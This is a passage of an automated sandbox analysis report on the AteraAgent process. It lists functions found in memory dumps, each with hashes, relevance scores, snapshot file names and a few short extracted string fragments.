                                                                                                                                                                                                                                                                            • Opcode ID: 50aaeaeae9a102bf78f4a7ffc080e4e7a48ba4700691e3abdbdd57f39b848abf
                                                                                                                                                                                                                                                                            • Instruction ID: 1eac23cef024acd6226e77e8de1b902a189d26ae994af1edd266c620a1305d96
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50aaeaeae9a102bf78f4a7ffc080e4e7a48ba4700691e3abdbdd57f39b848abf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4711C666949AC99BEB50FF6CD8951F97BA0FF86204F0506BAE04C8A0A3DD295C5982C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB45D132 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f4f0d37104ef1100130471ac947b2d5a62a7d9e2409d4df52abc7d8e4c246053
                                                                                                                                                                                                                                                                            • Instruction ID: 25d6a845e5237d3ae74cc1448aeb6cb337022b4b5858afb002f60532dfe9aa59
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4f0d37104ef1100130471ac947b2d5a62a7d9e2409d4df52abc7d8e4c246053
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9911937180EF8D9FEB85DB74D415AE8BFB1EF46340F4441BAE048D71A2CE685849C751
                                                                                                                                                                                                                                                                            Function 00007FFAAB4584B0 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: aee541fbe56765d1f4cc34cc2ecdeeac2d14452b13fd4f89fac79eb221c081ff
                                                                                                                                                                                                                                                                            • Instruction ID: d921b2a9e67594c1fcfaedce4fbad6e649b1aa005c6cd6066d733193eff791a4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aee541fbe56765d1f4cc34cc2ecdeeac2d14452b13fd4f89fac79eb221c081ff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6611E030D0A91DCFDB94DF58C484AEDBBB4EF1A311F0011A9D00DE3290DB35A994CB40
                                                                                                                                                                                                                                                                            Function 00007FFAAB4579CC Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e42c31ab14e89837fd333a3f104c46dbeb779b11ab4bea82c437a070be2c2ae0
                                                                                                                                                                                                                                                                            • Instruction ID: 823ea6375b23f56e0f5de1365be1613b66a4b9f54c70a29db6f602642646b434
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e42c31ab14e89837fd333a3f104c46dbeb779b11ab4bea82c437a070be2c2ae0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC01D661E45B4E9FE740EBA8A8159FDB7F4EF81261B8002BAD01CD7291DE6C1C868751
                                                                                                                                                                                                                                                                            Function 00007FFAAB454A4B Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 98a69a535aab986504c0c28ea806a809f1ad8586f256f872d2a4f875ee8becd9
                                                                                                                                                                                                                                                                            • Instruction ID: c693c13e65d8c5722696bd39fdfddf942cd2165de479b4e2dfe52b08730be98a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98a69a535aab986504c0c28ea806a809f1ad8586f256f872d2a4f875ee8becd9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E113A35A09A49CFDB84EF68D885AE9B3A1FF85300F5185B9E00CCB296CE35AC45CB40
                                                                                                                                                                                                                                                                            Function 00007FFAAB453B7D Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8396eab8468e3f5841772015198c93de8276f0c0dacfab42a53e6bef540a0d9f
                                                                                                                                                                                                                                                                            • Instruction ID: 1950d8a7e353f4ad96c7917a936da2a443427a45f271c932360c27a21e933ea8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8396eab8468e3f5841772015198c93de8276f0c0dacfab42a53e6bef540a0d9f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B11C672D0DA4D9FDB01DBA4D4156EDBBB4FF46310F0046BAD00ED7193DA6C55498B81
                                                                                                                                                                                                                                                                            Function 00007FFAAB451EA1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 23c775b366ad3ec4fd44130f254a610b0b81483a8c1dde36c44658ba0f05c84e
                                                                                                                                                                                                                                                                            • Instruction ID: 2d3feddacc918778db67f5ca7b7b5f2f0975be380f38f2be1c90e28b0b70649e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23c775b366ad3ec4fd44130f254a610b0b81483a8c1dde36c44658ba0f05c84e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0110770C09A2A8FEBA5DB1488457E9B7F1EB55350F1082E9D04D97261DA785EC98B80
                                                                                                                                                                                                                                                                            Function 00007FFAAB450C89 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b088bac30e2b732aaaf343d1474955025f265457d3674c4de0df76607b9e776b
                                                                                                                                                                                                                                                                            • Instruction ID: 74bf97e74fd500d0050b237466881902dfca8779de0ba010bd05ab1e8eae3667
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b088bac30e2b732aaaf343d1474955025f265457d3674c4de0df76607b9e776b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9701D67144EB4A8FE36AE774D4152EA77E1EF41321F4105BFC009EB2E1DA7D5D448A41
                                                                                                                                                                                                                                                                            Function 00007FFAAB451E7E Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9605e542a5abaf142dd1f0e21ae90a798f0cac537ed01d05535cee914eaa884a
                                                                                                                                                                                                                                                                            • Instruction ID: 3be3fd52bedff68e263300220d6a706752e12d40c2c81e29d269105a81e99320
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9605e542a5abaf142dd1f0e21ae90a798f0cac537ed01d05535cee914eaa884a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9001617490AA19DFEBA2DB748845698BBF4FF09350F1441E9D40DD3162DA3C5E868F40
                                                                                                                                                                                                                                                                            Function 00007FFAAB451EB6 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 492973b82d3f37aa9216ae41d0f2fe2f93aef6b7d88243c069b60d01e62a5e0e
                                                                                                                                                                                                                                                                            • Instruction ID: 3cacdb344e8df1a243d7d337e7942ebb3259e7e41fe3b6854f933783f1fb7acf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 492973b82d3f37aa9216ae41d0f2fe2f93aef6b7d88243c069b60d01e62a5e0e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11B6B0D09A298FEBA1DB248845BD9B7F0AF19340F4082EAD04DE3251DA785EC5CF40
                                                                                                                                                                                                                                                                            Function 00007FFAAB4518A4 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 44e8aa96fcf3e7917d0ec815d3aac29df1b0dceb3b2fc4b52d5ff56929aaad4c
                                                                                                                                                                                                                                                                            • Instruction ID: 0d821eea463630428ecb8f577cefbf6d3c4c233dbe3478e910278178614dcd7a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44e8aa96fcf3e7917d0ec815d3aac29df1b0dceb3b2fc4b52d5ff56929aaad4c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F01463090A6298FEB69DB60C4943E8B6B1BF06300F0005FED00EA72A2CB795D88CF00
                                                                                                                                                                                                                                                                            Function 00007FFAAB4532B8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: fb084042cc5793161079f1b2b420640303c307084d50f3fcb25a7aa7bbd2200d
                                                                                                                                                                                                                                                                            • Instruction ID: 12889aa12a3d330666f4f695912f7df91a98b8dc64b8b04c60c0f16ac0822727
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb084042cc5793161079f1b2b420640303c307084d50f3fcb25a7aa7bbd2200d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FF06D74809A9E9FDB41DBA494592ECBBF0EF46315F0482BAC058E71A2C67C0989CB90
                                                                                                                                                                                                                                                                            Function 00007FFAAB451CC7 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: df50087204859ce4e89691d213e34e0513dc4612aeed1b6749ffa4f385aa0231
                                                                                                                                                                                                                                                                            • Instruction ID: 63d8fb87ad2cd67f10b2746606fb1142c46e3972b5d5be9e46b269862ebe708b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df50087204859ce4e89691d213e34e0513dc4612aeed1b6749ffa4f385aa0231
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71F0AF70C1A75A9FD7229B7884066B8B7F0AF06700F5401FDD08AA31A3DA3C6D8ACB51
                                                                                                                                                                                                                                                                            Function 00007FFAAB451DD1 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2b33c2201124228b62b8bb49c0fd2f6a168d45ba293b523f47e530ecc03674fa
                                                                                                                                                                                                                                                                            • Instruction ID: 647632f044036f884bca8ec296a8d139a9a100c4f27ccd7041601fc425aceda5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b33c2201124228b62b8bb49c0fd2f6a168d45ba293b523f47e530ecc03674fa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AF0E23084A259CFC315CB749884AA9BFF0AF42314F1542F8C458EB1A2CB7C9C82C710
                                                                                                                                                                                                                                                                            Function 00007FFAAB451C27 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 83ce369d531204189bab95fce5c2fc1db0171ed277396cb9f468396fc7483792
                                                                                                                                                                                                                                                                            • Instruction ID: 4d222e3a1fd87be8d93fb9b17fd25f9c3a15368b5722ac5b9efe4e798e577bea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83ce369d531204189bab95fce5c2fc1db0171ed277396cb9f468396fc7483792
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16F01C7580A7699FE755DB70C8947ECBBF1AF42340F5480A9D00D672A1CA7D1EC9DB40
                                                                                                                                                                                                                                                                            Function 00007FFAAB451C77 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d0c0e94068f8c06762318fc5aeb167f0a28dfdf16d62fbec37af473cfa81cd2f
                                                                                                                                                                                                                                                                            • Instruction ID: da9fb5bea3cf7b5000242806a932719d8264de857f80ef53c6bec9ffe918bb62
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0c0e94068f8c06762318fc5aeb167f0a28dfdf16d62fbec37af473cfa81cd2f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F05831809269DFD7519A21C8007ECB7F0AF01300F44C0A8D009672A2CA7E1E85DF00
                                                                                                                                                                                                                                                                            Function 00007FFAAB45192D Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 30c42a82a5b26224b46c5b6efefafe90cffd94a7cb830f79853f32a610c9a4ae
                                                                                                                                                                                                                                                                            • Instruction ID: d00fca8e950b410d45265fb362863c87242925c30e9a407eea99a1a6cc697437
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30c42a82a5b26224b46c5b6efefafe90cffd94a7cb830f79853f32a610c9a4ae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7E0E571A066598FD796EB24C4157A476A1AB49310F5004FD900DC72A5CA3959C18B00
                                                                                                                                                                                                                                                                            Function 00007FFAAB451F6A Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f9f46baef1de16bde18b776e6f1c84c1831f3d26830990a45bead82459957c4c
                                                                                                                                                                                                                                                                            • Instruction ID: 567587265b60cccc231b95c40a6569c88c156cf7284a2f0a486c77f9a659892b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9f46baef1de16bde18b776e6f1c84c1831f3d26830990a45bead82459957c4c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBD0227144B74AAFC31297B05411098BFF06F07220B4000E8D008DB172C57EAC82C701
                                                                                                                                                                                                                                                                            Function 00007FFAAB451F8D Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 88d53cbc88cb28800e91b927d3c1effeee2e0cfd460b69504ffccec6e46bccd0
                                                                                                                                                                                                                                                                            • Instruction ID: f094e0b9ff820e50a2f637e5c35b73a852fb4b148f030c513ea6e59d7e4d01a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88d53cbc88cb28800e91b927d3c1effeee2e0cfd460b69504ffccec6e46bccd0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53D0127104B6866FD34257B494115957FF04F03260F5D04D9D458CB0A3D5AD1CC68311
                                                                                                                                                                                                                                                                            Function 00007FFAAB456E93 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 4db7e997fc44cbe5bcde5953b4116c764836bf346ba6dd5c1a6b7f147ab74357
                                                                                                                                                                                                                                                                            • Instruction ID: 3d6c6f74f20e2f8b8a644bdc1ec4782a8db930cb7af85f596ef5a8df6c7ab005
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4db7e997fc44cbe5bcde5953b4116c764836bf346ba6dd5c1a6b7f147ab74357
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7A00202ACB86E42A484A19D78420D8B245C7975B1BC56676ED0C8415A989E1DDA02D5

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 00007FFAAB460C58 Relevance: 13.4, Strings: 9, Instructions: 2148COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0W=$0W=$/3$/3$/3$/3$/3$/3$/3
                                                                                                                                                                                                                                                                            • API String ID: 0-1092848730
                                                                                                                                                                                                                                                                            • Opcode ID: 8a7a573ef412d15ecf50b67c1a50ac1c151067b072a30ce29e4da2b36f1865f7
                                                                                                                                                                                                                                                                            • Instruction ID: be2d7d4a78a7a7bab3a2559794afc70b6321e0b40dcda0211864822b76b20aa1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a7a573ef412d15ecf50b67c1a50ac1c151067b072a30ce29e4da2b36f1865f7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B036C70909619CFDB99EF28C494BA8B7B1FF5A344F2041F9D00DD72A2CA35AA85CF51
                                                                                                                                                                                                                                                                            Function 00007FFAAB486030 Relevance: 13.2, Strings: 9, Instructions: 1977COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63$63$63$63$63$63$8h5$8h5$\
                                                                                                                                                                                                                                                                            • API String ID: 0-2537858528
                                                                                                                                                                                                                                                                            • Opcode ID: f7b0434ae31584b3eba77b33d426429243f8d82175e0bcb2a7e705d1b449432e
                                                                                                                                                                                                                                                                            • Instruction ID: e32a239c6492f6fecd6f15a3c2784b7e8894a08f807bc20f03f44b6d2722f82a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7b0434ae31584b3eba77b33d426429243f8d82175e0bcb2a7e705d1b449432e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9D25831A1DA498FF799DB6C845567877E2EF96340F1481BED09EC72A3CD38A84683C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47900E Relevance: 7.0, Strings: 5, Instructions: 712COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: `o=$`o=$`o=$`o=$|P_H
                                                                                                                                                                                                                                                                            • API String ID: 0-751382402
                                                                                                                                                                                                                                                                            • Opcode ID: e6c02689b9e5034df8f15207e5379186ec08c799a80fea5f6a42d02853c622a8
